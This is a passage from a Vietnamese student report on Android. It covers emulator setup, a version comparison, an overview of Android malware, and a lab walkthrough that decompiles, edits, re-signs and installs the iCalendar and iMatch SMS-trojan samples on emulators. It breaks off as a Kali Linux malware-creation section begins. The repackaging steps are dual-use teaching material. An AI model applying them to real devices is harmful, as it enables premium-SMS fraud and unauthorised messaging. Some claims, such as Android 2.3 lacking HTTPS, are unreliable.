tiếp tục đến nay. Được xem là sự thay đổi lớn trong lịch sử phát triển của Android với nhiều cải

tiến về mặt công nghệ cung như tính năng. Đặc biệt phiên bản này là sự hợp nhất cho hệ điều

hành smartphone và máy tính bảng.

Android 5 (API mức độ 20): phát hành tháng 7 năm 2014 là phiên bản cho nhà phát triển.

Theo dữ liệu cập nhật mới nhất mà Google cung cấp về thị phần các phiên bản Android tại

link: http://developer.android.com/about/dashboards/index.html.Đến ngày 7/7/2014 thị phần

của các phiên bản Android 2.3.x và 4.x.x chiếm tỉ lệ lớn nhất thể hiện sự quan trọng và thông

dụng nhất của các phiên bản Android này.Trong đó, Android 2.3.x chiếm 13.5% còn

Android 4.x.x chiếm 85.8 %

1.5 Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lâp.

1.5.1. Cài đặt Java SE trên máy tính.

Để cài đặt Android trên môi trường giả lập trước tiên cần cài đặt môi trường Java For

Developers để chạy được Eclipse và Android SDK. Ở đây mình sử dụng hệ điều hành Windows 8

64-bit (các phiên bản Windows khác đều tương tự). Đầu tiên bạn cần dowload bộ cài đặt Java SE

tại link sau http://www.oracle.com/technetwork/java/javase/downloads/index.html

Page 19: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

19

Hinh 3. Download Java SE

Chọn Jaca Platform (JDK) 8u5 để chuyển sang trang tiếp theo.

Hình 4. Chọn phiên bản Java.

Chọn phiên bản thích hợp với hệ điều hành để tải về. Ở đây mình chọn bản cho Windows

64-bit.

Page 20: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

20

Chạy bộ cài đặt vừa được tải về ta được như hình sau:

B1. Chạy file cài đặt java JDK -> Click Next.

Hinh 5:Cài đặt Java

B2. Chọn thư mục cài đặt -> Click Next.

Page 21: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

21

Hinh 6:Cài đặt Java

B3. Quá trình cài đặt thành công java JDk sẽ được thông báo như hình dưới ->

Click Close.

Page 22: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

22

Hinh 6:Cài đặt Java hoàn tất

Sau khi cài xong, các bạn kiểm tra lại bộ JDK đã được cài đặt thành công bằng cách vào

cmd gõ lệnh “java”. Nếu màn hình hiện ra như sau thì bạn đã cài đặt thành công:

Page 23: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

23

Hình 7. Kiểm tra Java đã được cài đặt.

1.5.2. Cài đặt Eclipse và Android SDK

Trước tiên download bộ ADT Bundle for Windows gồm Eclipse và Android SDK được

tích hợp sẵn tại địa chỉ: http://developer.android.com/sdk/index.html

Page 24: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

24

Hình 8. Download Android SDK.

Chọn dowload để sang trang tiếp theo

Hình 9. Chọn phiên bản Android SDK.

Chọn phiên bản thích hợp va tiến hành dowload (như hình). Sau khi tải xong tiến hành giải

nén ta được các file như hình:

Hình 10. Giải nén file Android SDK tải về.

Page 25: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

25

Để cài đặt Android SDK các bạn có 2 cách:

- Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài

đặt.

- Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager

Hình 12. Khởi động Android SDK Manager.

Sẽ xuất hiện 1 cửa sổ mới như sau :

Hình 13. Chọn và cài đặt các gói API cần thiết.

Download các gói hỗ trợ như:Android SDK Buil-tools, Android SDK Platform-tools, các

phiên bản Android và các gói hỗ trợ khác… bằng cách tích chọn các phần API cần cài rồi click

vào nút Install packages ở góc dưới bên phải

Page 26: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

26

Hình 14.cài đặt các gói API cần thiết.

Công việc tiếp theo là các bạn chỉ cần chờ cho nó download và cài đặt là xong.

1.5.3. Tạo máy AVD (Android Virtual Device).

Sau khi khởi chạy xong Eclipse. Bạn vào : Windows -> Android Virtual

Device Manager.

Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :

Hình 15. Khởi động Android Virtual Device Manager.

Click vào New để tạo mới :

Page 27: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

27

Hình 16. Tạo mới máy ảo Android.

Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :

Page 28: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

28

Hình 17. Thông số cho máy ao Android.

AVD Name: Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” mà thôi.

Target: Bạn chọn phiên bản Android để test.

SD Card: Là dung lượng bộ nhớ ảo của thẻ SD.

Và một số thông tin khác…

Các bạn click OK để hoàn thành tạo mới một AVD.

Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tên

máy ảo mới mình vừa tạo rồi.

Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảo

khởi chạy):

Page 29: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

29

Hình 18. Khởi động máy ảo Android.

Và đây là giao diện cuối cùng :

Page 30: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

30

Hình 19. Máy ảo Android khởi động hoàn tất.

Thực hiện tương tự để tạo Android phiên bản 4.x.

1.6 So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x.

1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.

Android 2.3 (Gingerbread)

Android 4.0 (Ice Cream Sandwich)

Cần ít nhất 128MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng.

Cần ít nhất 340MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng.

Dung lượng RAM tối thiểu cần thiết là 150MB.

Dung lượng RAM tối thiểu cần thiết là 350MB.

Page 31: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

31

Màn hình: - Màn hình phải có kích cỡ ít nhất 2,5

inch.

- Độ phân giải màn hình ít nhất là 100 dpi. - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779

(16:9).

- Công nghệ màn hình được sử dụng là

công nghệ “square pixels”.

Màn hình: - Màn hình phải có kích cỡ ít nhất

426x320dp.

- Độ phân giải màn hình ít nhất là 120 dpi. - Tỉ lệ màn hình từ 1.3333 (4:3) đến 1,85

(16:9) .

Yêu cầu có các phím vật lý. Không yêu cầu có các phím vật lý.

Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để

tải dữ liệu. Trình quản lý download phải

có khả năng tải tập tin có dung lượng ít nhất 55MB.

Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải

dữ liệu. Trình quản lý download phải có khả

năng tải tập tin có dung lượng ít nhất 100MB.

Kiểm tra hiệu suất dựa trên thời gian mở ứng dụng (performance matrics):

- Trình duyệt: ít hơn 1300ms. - MMS/SMS: ít hơn 700ms. - Báo thức: ít hơn 650ms.

Kiểm tra hiệu suất dựa trên thời gian mở ứng dụng (performance matrics):

- Trình duyệt: ít hơn 1300ms. - MMS/SMS: ít hơn 700ms. - Cài đặt: ít hơn 700ms.

1.6.2. Sự khác nhau về giao diện.

Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng

cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu

lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn

ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng

rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên

trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng

dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn

hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho

phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển vô-lăng.

Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu

với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc)

trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện

ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những

Page 32: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

32

nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc

những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang

xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có

thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho

ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí

bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần lớn

những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết

bị Android của họ để phân biệt với các hãng cạnh tranh.

Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình

trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm

thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận,

mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời

đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các

thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi

có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho

đến khi người dùng đã đọc hoặc xóa nó đi.

Android 2.3 (Gingerbread)

Android 4.0 (Ice Cream Sandwich)

Giao diện đơn giản. Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn.

Chỉ hỗ trợ phím ảo là phím Home. Hỗ trợ các phím ảo: Home, Back, zoom

Không có widget menu. Có widget menu giúp tìm nhanh thông tin mà không cần mở ứng dụng.

1.6.3. Sự khác nhau về tính năng.

Android 2.3 (Gingerbread)

Android 4.0 (Ice Cream Sandwich)

Thiết kế tối ưu hóa cho smartphones. Thiết kế tối ưu hóa cho cả smartphones và tablets.

Chỉ có thể xóa tất cả các thông báo cùng lúc trên trình quản lí thông báo.

Có thể xóa riêng rẽ từng thông báo trên trình quản lí thông báo.

Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị khóa.

Có thể thực hiện thêm một số tính năng khi màn hình bị khóa ngoài trả lời, ngắt cuộc gọi

như gửi tin nhắn...

Không có tính năng mở khóa màn hình nhận diện khuôn mặt (face unlock).

Có tính năng mở khóa màn hình nhận diện khuôn mặt (face unlock)

Page 33: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

33

Không hỗ trợ chỉnh sửa hình ảnh. Hỗ trợ phần mềm chỉnh sửa hình ảnh, tự động nhận diện được tất cả các camera trên

thiết bị.

1.6.4. Sự khác nhau về giao thức mạng.

Android 2.3 (Gingerbread)

Android 4.0 (Ice Cream Sandwich)

Không hỗ trợ giao thức https Hỗ trợ giao thức https

2. Mã độc trên Android.

2.1. Định nghĩa:

Mã độc là một đoạn code được đưa vào phần mềm nhằm thay đổi các thực thi của hệ điều

hành hoặc các chương trình bảo vệ máy tính mà không cần sự cho phép của người sử dụng.

Bằng cách này, phần mềm có chứa mã độc sẽ:

Phá hoại hệ thống máy tính như xóa, sửa, làm hỏng file, dữ liệu….

Phát tán thư rác.

Lợi dụng máy tính của bạn làm công cụ tấn công các hệ thống mạng máy tính khác.

Đánh cắp thông tin: thông tin về địa chỉ mail, thông tin cá nhân, tài khoản ngân hàng, thẻ

tín dụng,….

2.2. Mã độc trong môi trường Android:

2.2.1. Android là một môi trường lý tưởng cho mã độc phát triển.

Phần lớn các smartphone đều hỗ trợ các ứng dụng email, internet baking…Sử dụng các

ứng dụng này đồng nghĩa với việc cung cấp thông tin cá nhân.

Android hiện tại giữ vị trí số một trong các hệ điều hành dành cho smartphone và máy

tính bảng.

Android là một hệ điều hành mã nguồn mở.

Page 34: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

34

2.2.2. Phân loại mã độc Android.

Có nhiều cách phân loại khac nhau như: Troy Vennon dựa vào cách hoạt động lây nhiễm

của mã độc đã chia ra làm bốn loại, K.H.Khan & M.N.Tahir phân loai mã độc làm 6 nhóm.

Theo trang web forenics chuyên nghiên cứu về mã độc dựa vào mục tiêu của mã độc để chia ra

làm 9 họ:

Đánh cấp thông tin cá nhân 51,3%

Gửi tin nhắn trái phép (IMEL,..) 30,1%

Botnet(spam, thư rác,..) 23,5%

Truy cập Root 18,3%

Tải từ Google-Play 11,3%

Cài đặt các ứng dụng khác 10,4%

Đánh cấp định vị của người dùng 8,7%

Cài đặt các ứng dụng hỗ trợ hacker 7,8%

Trojans (tiếp cận các dịch vụ ngân hàng trực tiếp) 3,5%

2.3. Thực trạng

Theo thống kê được thực hiện dựa trên số liệu từ hệ thống giám sát virút của Bkav, chỉ trong

năm tháng đầu năm 2014, phần mềm bảo vệ smartphone Bkav Mobile Security đã cập nhật

621.000 mã độc mới xuất hiện, vượt xa số lượng 528.000 của cả năm 2013. Đặc biệt, mỗi ngày có

262.000 điện thoại bị nhiễm loại mã độc gửi tin nhắn SMS đến đầu số tính phí. “Đây là các đầu số

thu phí 15.000 đồng/tin nhắn, tính ra mỗi ngày người sử dụng VN bị “móc túi” số tiền khổng lồ lên

tới hơn 3,9 tỉ đồng”, báo cáo của Bkav kết luận. Thực tế, số tiền các loại virút “móc túi” người

dùng smartphone có thể hơn gấp nhiều lần vì có rất nhiều điện thoại bị nhiễm virút trong một thời

gian dài nhưng chủ nhân không nhận biết và cũng không có biện pháp kiểm tra, theo dõi.

Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên

Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được

phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android. Đây là một con số

Page 35: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

35

báo động về tình trạng mã độc trên nền tảng di động của Google vừa được hãng bảo mật

Kaspersky Lab công bố.

Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để

sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin nhắn lừa

đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông tin như là mật

khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này

chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Android trong quý I năm 2013.

Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng các

mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, Kaspersky đã phát

hiện được số lượng mã độc mới trên các nền tảng di động bằng tổng số lượng mã độc được phát

hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh hưởng nặng nhất.

Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại mã

độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo mật, khi sự

phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng thời việc quản lý

các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã độc được phát tán dễ

dàng hơn trên nền tảng di động này.

Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý

1/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu dựa vào việc phát tán

các đường link trang web có chứa mã độc. Các đường link có chứa mã độc này chủ yếu được

phát tán thông qua email và trên các mạng xã hội như Facebook, Twitter… Đây được xem là

biện pháp được yêu thích nhất hiện nay của hacker.

Con số cụ thể các loại mã độc (bao gồm cả trên nền tảng di động và các nền tảng khác) đã

được Kaspersky phát hiện và vô hiệu hóa trong quý I năm 2013 là

1.345.570..352 mã độc (hơn 1 tỉ mã độc). Trong đó có hơn 60% các loại mã độc phát tán từ 3

quốc giá: Mĩ (25%), Nga (19%) và Hà Lan (14%).

2.4. Malware – tiêu biểu của trên Android.

Đã không còn chỉ là mối lo ngại với người sử dụng máy tính, hiện nay Malware đã và đang tấn

công mạnh mẽ đến các hệ điều hành dành cho smartphone, đặc biệt là Android.

Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy

tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng

Page 36: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

36

không hề hay biết. Người viết nên nó ban đầu chỉ tập trung vào máy tính, nhất là Windows khi

nó chiếm đến 90% tổng số Malware xuất hiện trên các nền tảng, bên cạnh đó là các OS khác

như Linux, Chrome OS, MacOs... nhưng không đáng kể. Tuy nhiên giờ đây khi smartphone

đang ngày càng phát triển và phổ biến dần thay thế máy tính từ các công việc soạn thảo văn bản,

giải trí đến giao dịch ngân hàng thì nó trở thành mục tiêu tấn công của Malware.

Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ

dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan.

Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như

một phần mềm gián điệp (Trojan), phần lớn nhắm vào dịch vụ Mobile Banking trên Smartphone

để lấy cắp thông tin, các thao tác xác nhận... thông qua việc sử dụng SMS Spy, tức là theo dõi

tin nhắn SMS khi bạn thực hiện giao dịch với ngân hàng. Bên cạnh đó là nhằm vào các cuộc gọi

thực hiện trên máy bạn, tắt một số dịch vụ để dễ kiểm soát.

2.4.1. Cơ chế hoạt động của Malware.

Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware

DroidDream. Malware này hoạt động qua 2 giai đoạn:

Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa

Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn

ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.

Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép

quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm

tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được

quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,

DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống

này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.

Không giống như giai đoạn 1, người dùng phải khởi động ứng dụng để bắt đầu việc lây

nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều

nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này

được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h

sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất.

Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên

chiếc smartphone của mình.

Page 37: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

37

2.4.2. Mục đích của Malware DroidDream

DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của

con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự

động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến

đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây

có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền

cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại

sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành

động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn

code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng

thực sẽ bị thu thập bởi các malware này.

Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn

đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì

vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của

người dùng hệ điều hành này.

2.5. Cơ chế bảo mật trong Android.

2.5.1. Tính bảo mật trong Android

Các ứng dụng android được tách biệt với nhau trong quá trình thực thi.

Các ứng dụng android được phân biệt bởi system ID.

Các ứng dụng android phải được signing mới có thể cài đặt vào hệ thồng.

Bảo mật trong android được thể hiện qua cơ chế “Permission”

2.5.2. Cơ chế Permission:

Bất cứ những tác vụ nào gây ảnh hưởng cho các ứng dụng khác, hệ điều hành và người sử

dụng thiết bị đều đươc bảo vệ bởi cơ chế Permission, ví dụ như đọc gửi tin nhắn, truy cập mạng,

thực hiện cuộc gọi, truy cập vào thông tin cá nhân,..Nói cách khác người lập trinh ứng dụng sẽ

khai báo Permission cho những nguông tài nguyên này sẽ được thông báo đến người dùng trước

khi cài đặt ứng dụng.

2.5.3. Google Play:

Kiểm soát các mã độc trên ứng dụng.

Page 38: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

38

3. Cài đặt một số chương trình có mã độc trên Android.

3.1. iCalendar

iCalendar là 1 chương trình dạng lịch xuất xứ từ Trung Quốc có gắn kèm mã độc thực hiện gửi

1 tin nhắn đến 1 số điện thoại định trước mà không thông qua sự cho phép của người dùng.

3.1.1. Các công cụ cần thiết:

Apktool : https://code.google.com/p/android- apktool/downloads/list)

dex2jar : https://code.google.com/p/dex2jar/)

id-gui : https://code.google.com/p/innlab/downloads/detail?name=jd-gui-

0.3.3.windows.zip&can=2&q=)

File iCalendar.apk: http://securityxploded.com/demystifying-android-malware.php

Hai máy ảo Android (xem hướng dẫn tạo máy ảo ở trên).

3.1.2. Các bước thực hiện:

B1. Dùng phần mềm 7-Zip giải nén file iCalendar,rồi vào đó copy file classes.dex vào folder

chứa công cụ dex2jar.

Hình 20 : Folder iCalendar

Page 39: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

39

B2. Vào CommanWindow di chuyển đến folder chứa công cụ dex2jar thực hiện câu lệnh:

dex2jar classes.dex để chuyển file classes.dex thành file .jar ta thu được file classes_dex2jar.jar

.

Hình 21: file classes_dex2jar.jar trong folder dex2jar

B3. Dùng công cụ id-gui mở file classes_dex2jar thu được ở bước 2 để

xem source code của ứng dụng iCalendar.

Page 40: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

40

Hình 22 : Giao diện công cụ id-gui

B4. Vào CommanWindow di chuyển đến folder chứa công cụ apktool

(folder có công cụ apktool phải chứa file iCalendar.apk) thực hiện lần lượt 2 câu lệnh sau:

+ apktool if iCalendar.apk

+ apktool d iCalendar.apk

Hình 23: 2 lệnh apktool thực hiện thành công

Ta thu được folder smali có chứa các file source code ứng dụng.

Hình 24: file iCalendar.smali và SmsReceiver.smali

Page 41: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

41

B5.Sửa các thông số ở 2 file iCalendar.smali và SmsReceiver.smali

để thực hiện trên thiết bị giả lập.

Hình 25: Sửa thông số line

Page 42: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

42

Hình 26: Sửa thông số line 41

B6. Vào CommandWindow thực hiện câu lệnh sau để đóng gói lại ứng dụng iCalendar đã

được chỉnh sửa và ta thu được gói iCalendar.apk mới ở thư mục:…apktool\iCalendar\dist:

apktool b iCalendar

Hình 27: Lệnh đóng gói của apktool thực hiện thành công

B7. Di chuyển đến thư mục …java/bin (có chứa gói iCalendar.apk vừa mới tạo ra ở bước 6)

và thực hiện 3 câu lệnh sau để verify gói apk này có thể sử dụng được trên thiết bị, các bước thực

hiện từng câu lệnh ta sẽ thực hiện theo hướng dẫn trên CommandWindow, kết quả ta thu được

như hình 10:

+ keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg

RSA -keysize 2048 -validity 10000

+ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore

iCalendar-iCalendar.keystore iCalendar.apk iCalendar

+ jarsigner -verify -verbose -certs iCalendar.apk

Page 43: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

43

Hình 28: gói apk verified thành công

B8. Dùng lệnh sau để cài đặt ứng dụng vào thiết bị giả lập (ở đây ta cài đặt vào thiết bị 5554):

adb -s emulator-5554 install iCalendar.apk

Page 44: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

44

Hình 29: Lệnh cài đặt ứng dụng vào thiết bị giả lập thành công

B9.Kiểm tra kết quả trên thiết bị.

Hình 30 : Ứng dụng iCalendar đã được cài đặt

B10.Thực hiện kích hoạt Trojan gửi tin nhắn từ thiết bị 5554 sang thiết bị 5556.Kết quả thành

công .

Page 45: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

45

Hinh 31: Android02 nhận được tin nhắn từ iCalendar.

3.2. iMatch

Tương tự như iCalendar, iMatch cho phép gửi tinh nhắn trái phép khi mã độc bị kích hoạt.

Điểm khác nhau ở đây là iMatch là một ứng dụng game và mã độc có thể gửi bốn tin nhắn cho 4 số

điện thoại giống hoặc khác nhau.

3.2.1. Các công cụ cần thiết:

Super Apk tool: https://code.google.com/p/super-apk-tool/

iMatch : http://contagiodump.blogspot.com/2011/03/take-sample-leave-sample-mobile-

malware.html

Hai máy ảo Android (xem hướng dẫn tạo máy ảo ở trên).

3.2.2. Các bước thực hiện:

Thực hiện tương tự như với iCalendar.apk nhưng thay thế bằng file iMatch.apk. Tại bước

View Smali Code ta vào tiếp theo đường dẫn .\com\mj\utils ta được

Page 46: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

46

Hinh 32. Thư mục untils.

Mở file MJUtils.smali bằng Notepad hoặc Notepad++ và thực hiện đổi số điện thoại

người nhận và nội dung tin nhắn tại bốn vị trí sau :

Hinh 33. Nội dung tin nhắn 1.

Hinh 34. Nội dung tin nhắn 2.

Page 47: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

47

Hinh 35. Nội dung tin nhắn 3.

Hinh 36. Nội dung tin nhắn 4.

Sau khi lưu lại ta buil và nhận được kết quả

Hinh 37. Kết quả chạy chương trinh iMatch.

Ta thấy khi ứng dụng iMatch tai máy Android01 được khởi động thì có bốn tin nhắn được

gửi đến máy Android02 (vì ở đây thiết đặt bốn số điện thoại đến giống nhau là máy Android02).

4. Nghiên cứu Kali Linux, cách tạo mã độc trên Kali Linux để xâm nhập vào máy

Android

Page 48: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

48

4.1. Tổng quan

Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra

bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack,

xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm

liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của

BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và

phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng

cần sử dụng khi tác nghiệp.

4.2. Cải tiến của Kali Linux so với Backtrack.

Kali phát triển trên nền tảng hệ điều hành Debian

Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần

mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập

nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với

các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.

Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của

Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống

